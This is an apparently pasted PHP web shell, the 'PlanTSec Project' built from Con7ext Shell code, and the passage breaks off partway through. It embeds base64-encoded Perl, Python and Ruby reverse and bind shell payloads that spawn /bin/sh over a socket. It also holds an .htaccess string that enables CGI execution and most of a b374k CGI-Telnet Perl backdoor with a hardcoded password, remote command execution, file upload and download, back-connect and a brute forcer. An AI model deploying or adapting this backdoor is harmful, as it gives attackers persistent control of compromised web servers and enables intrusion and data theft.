· 6 years ago · Aug 24, 2019, 02:24 PM
1<?php
2## Codename : PlanTSec Project
3## Some Function From Con7ext Shell
4session_start();
5set_time_limit(0);
6error_reporting(0);
7date_default_timezone_set("Asia/Jakarta");
8$pass = "a9ae34012856a0f97e530102dfaa0f1d"; // rintod
9define("PERL_BC", "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
10define("PYTHON_BC", "IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==");
11define("RUBY_BC", "IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
12define("HTACCESS", "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .con7ext");
13define("CGI_1", "#!/usr/bin/perl -I/usr/local/bandmin
use MIME::Base64;
$Version= "CGI-Telnet Version 1.3";
$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>b374k - CGI-Telnet</font>";

$Password = "xaisyndicate";			# Change this. You will need to enter this to login.
sub Is_Win(){
	$os = &trim($ENV{"SERVER_SOFTWARE"});
	if($os =~ m/win/i){
		return 1;
	}
	else{
		return 0;
	}
}
$WinNT = &Is_Win();				# You need to change the value of this to 1 if
								# you're running this script on a Windows NT
								# machine. If you're running it on Unix, you
								# can leave the value as it is.

$NTCmdSep = "&";				# This character is used to seperate 2 commands
								# in a command line on Windows NT.

$UnixCmdSep = ";";				# This character is used to seperate 2 commands
								# in a command line on Unix.

$CommandTimeoutDuration = 10000;	# Time in seconds after commands will be killed
								# Don't set this to a very large value. This is
								# useful for commands that may hang or that
								# take very long to execute, like "find /".
								# This is valid only on Unix servers. It is
								# ignored on NT Servers.

$ShowDynamicOutput = 1;			# If this is 1, then data is sent to the
								# browser as soon as it is output, otherwise
								# it is buffered and send when the command
								# completes. This is useful for commands like
								# ping, so that you can see the output as it
								# is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
$cols= 150;
$rows= 26;
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse 
{
	local (*in) = @_ if @_;
	local ($i, $loc, $key, $val);
	
	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

	if($ENV{'REQUEST_METHOD'} eq "GET")
	{
		$in = $ENV{'QUERY_STRING'};
	}
	elsif($ENV{'REQUEST_METHOD'} eq "POST")
	{
		binmode(STDIN) if $MultipartFormData & $WinNT;
		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
	}

	# handle file upload data
	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
	{
		$Boundary = '--'.$1; # please refer to RFC1867 
		@list = split(/$Boundary/, $in); 
		$HeaderBody = $list[1];
		$HeaderBody =~ /\r\n\r\n|\n\n/;
		$Header = $`;
		$Body = $';
 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
		$in{'filedata'} = $Body;
		$Header =~ /filename=\"(.+)\"/; 
		$in{'f'} = $1; 
		$in{'f'} =~ s/\"//g;
		$in{'f'} =~ s/\s//g;

		# parse trailer
		for($i=2; $list[$i]; $i++)
		{ 
			$list[$i] =~ s/^.+name=$//;
			$list[$i] =~ /\"(\w+)\"/;
			$key = $1;
			$val = $';
			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} = $val; 
		}
	}
	else # standard post data (url encoded, not multipart)
	{
		@in = split(/&/, $in);
		foreach $i (0 .. $#in)
		{
			$in[$i] =~ s/\+/ /g;
			($key, $val) = split(/=/, $in[$i], 2);
			$key =~ s/%(..)/pack("c", hex($1))/ge;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} .= "\0" if (defined($in{$key}));
			$in{$key} .= $val;
		}
	}
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
	$EncodedCurrentDir = $CurrentDir;
	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
	my $dir =$CurrentDir;
	$dir=~ s/\\/\\\\/g;
	print "Content-type: text/html\n\n";
	print <<END;
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Hacsugia</title>

$HtmlMetaHeader

</head>
<style>
body{
font: 10pt Verdana;
}
tr {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
color: #ff9900;
}
td {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
color: #2BA8EC;
font: 10pt Verdana;
}

table {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: #111;
}


input {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: Black;
font: 10pt Verdana;
color: #ff9900;
}

input.submit {
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #FFFFFF;
border-color: #009900;
}

code {
border			: dashed 0px #333;
BACKGROUND-COLOR: Black;
font: 10pt Verdana bold;
color: while;
}

run {
border			: dashed 0px #333;
font: 10pt Verdana bold;
color: #FF00AA;
}

textarea {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: #1b1b1b;
font: Fixedsys bold;
color: #aaa;
}
A:link {
	COLOR: #2BA8EC; TEXT-DECORATION: none
}
A:visited {
	COLOR: #2BA8EC; TEXT-DECORATION: none
}
A:hover {
	text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
	color: #ff9900; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}

.listdir tr:hover{
	background: #444;
}
.listdir tr:hover td{
	background: #444;
	text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
	color: #FFFFFF; TEXT-DECORATION: none;
}
.notline{
	background: #111;
}
.line{
	background: #222;
}
</style>
<script language="javascript">
function chmod_form(i,file)
{
	/*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
	var ajax="";
	document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
	document.getElementById("text_" + i).focus();
}
function rm_chmod_form(response,i,perms,file)
{
	response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
}
function rename_form(i,file,f)
{
	var ajax="";
	f.replace(/\\\\/g,"\\\\\\\\");
	var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
	document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
	document.getElementById("text_" + i).focus();
}
function rm_rename_form(i,file,f)
{
	if(f=='f')
	{
		document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
	}else
	{
		document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
	}
}
</script>
<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<center><code>
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
	<td align="center" rowspan=2>
		<b><font size="5">$EditPersion</font></b>
	</td>

	<td>

		<font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
	</td>
	<td>Server IP:<font color="#bb0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#bb0000">$ENV{'REMOTE_ADDR'}</font>
	</td>

</tr>

<tr>
<td colspan="3"><font face="Verdana" size="2">
<a href="$ScriptLocation">Home</a> | 
<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Command</a> |
<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">GUI</a> | 
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |

<a href="$ScriptLocation?a=backbind">Back & Bind</a> |
<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
<a href="$ScriptLocation?a=checklog">Check Log</a> |
<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
<a href="$ScriptLocation?a=logout">Logout</a> |
<a target='_blank' href="#">Help</a>

</font></td>
</tr>
</table>
<font id="ResponseData" color="#ff99cc" >
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{

	print <<END;
<pre><script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true;	// Never run.
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 100 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
  if(this.running) return;
  if(typeof this.origText == "undefined") {
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);	// We haven't finished loading yet.  Have patience.
    return;
  }
  if(this.currentText == "") this.element.innerHTML = "";
//  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  if(this.currentChar < this.origText.length) {
    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
      this.tagBuffer = "<";
      this.inTag = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
      this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
      this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
      this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
    this.currentChar++;
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  } else {
	this.currentText = "";
	this.currentChar = 0;
        this.running = false;
        this.finishedCallback();
  }
}
</script>
</pre>

<font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 Rohitab Batra </font><br><br>
<table align="center" border="1" width="600" heigh>
<tbody><tr>
<td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>

<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>

<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>

<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
</tr>
</tbody></table>
<br>

<script type="text/javascript">
new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
TypingText.runAll();

</script>
END
}

#------------------------------------------------------------------------------
# Add html special chars
#------------------------------------------------------------------------------
sub HtmlSpecialChars($){
	my $text = shift;
	$text =~ s/&/&amp;/g;
	$text =~ s/"/&quot;/g;
	$text =~ s/'/&#039;/g;
	$text =~ s/</&lt;/g;
	$text =~ s/>/&gt;/g;
	return $text;
}
#------------------------------------------------------------------------------
# Add link for directory
#------------------------------------------------------------------------------
sub AddLinkDir($)
{
	my $ac=shift;
	my @dir=();
	if($WinNT)
	{
		@dir=split(/\\/,$CurrentDir);
	}else
	{
		@dir=split("/",&trim($CurrentDir));
	}
	my $path="";
	my $result="";
	foreach (@dir)
	{
		$path .= $_.$PathSep;
		$result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
	}
	return $result;
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
	print <<END;
<br>Login : Administrator<br>

Password:<br>
Login incorrect<br><br>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
	print <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
Login : Administrator<br>
Password:<input type="password" name="p">
<input class="submit" type="submit" value="Enter">
</form>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
	print "<br><font color=red>o---[  <font color=#ff9900>Edit by $EditPersion </font>  ]---o</font></code></center></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{'}
#------------------------------------------------------------------------------
sub GetCookies
{
	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
	foreach $cookie(@httpcookies)
	{
		($id, $val) = split(/=/, $cookie);
		$Cookies{$id} = $val;
	}
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
	print "Connection closed by foreign host.<br><br>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
	&PrintPageHeader("p");
	&PrintLogoutScreen;

	&PrintLoginScreen;
	&PrintLoginForm;
	&PrintPageFooter;
	exit;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin 
{
	if($LoginPassword eq $Password) # password matched
	{
		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
		&PrintPageHeader;
		print &ListDir;
	}
	else # password didn't match
	{
		&PrintPageHeader("p");
		&PrintLoginScreen;
		if($LoginPassword ne "") # some password was entered
		{
			&PrintLoginFailedMessage;

		}
		&PrintLoginForm;
		&PrintPageFooter;
		exit;
	}
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
	my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
	$Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
	return <<END;
<form name="f" method="POST" action="$ScriptLocation">

<input type="hidden" name="a" value="command">

<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" size="50" name="c">
<input class="submit"type="submit" value="Enter">
</form>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
	my $dir = &AddLinkDir("download"); 
	$Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
	return <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input class="file" type="text" name="f" size="35"><br><br>
Download: <input class="submit" type="submit" value="Begin">

</form>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
	my $dir= &AddLinkDir("upload");
	$Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
	return <<END;
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input class="file" type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
<label for="up">Overwrite if it Exists</label><br><br>
Upload:&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input class="submit" type="hidden" name="a" value="upload">

</form>

END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
	if(!$WinNT)
	{
		alarm(0);
		return <<END;
</textarea>
<br><font color=yellow>
